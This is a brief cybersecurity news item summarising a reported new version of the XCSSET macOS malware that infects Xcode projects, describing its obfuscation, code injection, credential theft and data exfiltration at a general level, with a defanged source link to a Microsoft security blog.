XCSSET malware’s latest version targets Xcode projects, that can evade traditional security methods. Its primary motive is to steal sensitive user data and system information and exfiltrate it to remote servers controlled by threat actors.
Background
XCSSET, a sophisticated malware strain discovered in 2022, has become more dangerous. XCSSET now employs complex obfuscation methods such as code encryption and delayed execution, which prevent the malware from being flagged by static analysis tools or heuristic detection systems.
By targeting Xcode, a widely used development environment for macOS, the malware aims to compromise not only the individual machines but potentially entire development environments.
Why it Matters
- Data Exfiltration: The malware’s main goal remains data theft, with XCSSET’s operators using compromised systems to steal valuable files and exfiltrate sensitive information back to remote command-and-control servers.
- With the enhanced capabilities, XCSSET poses not just a risk to individual developers but also to software supply chains.
- XCSSET takes advantage of macOS Keychain to steal credentials and sensitive information.
- Some parts of the XCSSET infection are fileless, which means they don’t leave a traceable file on the system.
Technical Details
- The malware uses dynamic loading of code during execution, triggering malicious payloads only when needed, thus evading detection during installation or system scans.
- XCSSET injects malicious code into legitimate processes like Xcode or macOS system binaries. This makes it harder to detect because the injected code operates within trusted system processes.
- XCSSET targets Xcode project files (.xcodeproj) and other development-related files, exfiltrating sensitive data and sending it to the attacker’s c2 servers.
- The malware can also capture sensitive user data, such as macOS system information (hardware specs, installed software), and browsing history.
- XCSSET can also intercept and manipulate network traffic, allowing it to steal credentials sent over unencrypted connections.
- The malware frequently uses HTTP or HTTPS over non-standard ports to evade detection by firewalls and IDPS.
The Bottom Line
XCSSET’s enhanced obfuscation and persistence technique make it a serious threat to developers using Xcode. Targeting sensitive project files poses risks to the software supply chain.
Follow us on X and LinkedIn for the latest cybersecurity news.
Source: hxxps[://]www[.]microsoft[.]com/en-us/security/blog/2025/03/11/new-xcsset-malware-adds-new-obfuscation-persistence-techniques-to-infect-xcode-projects/
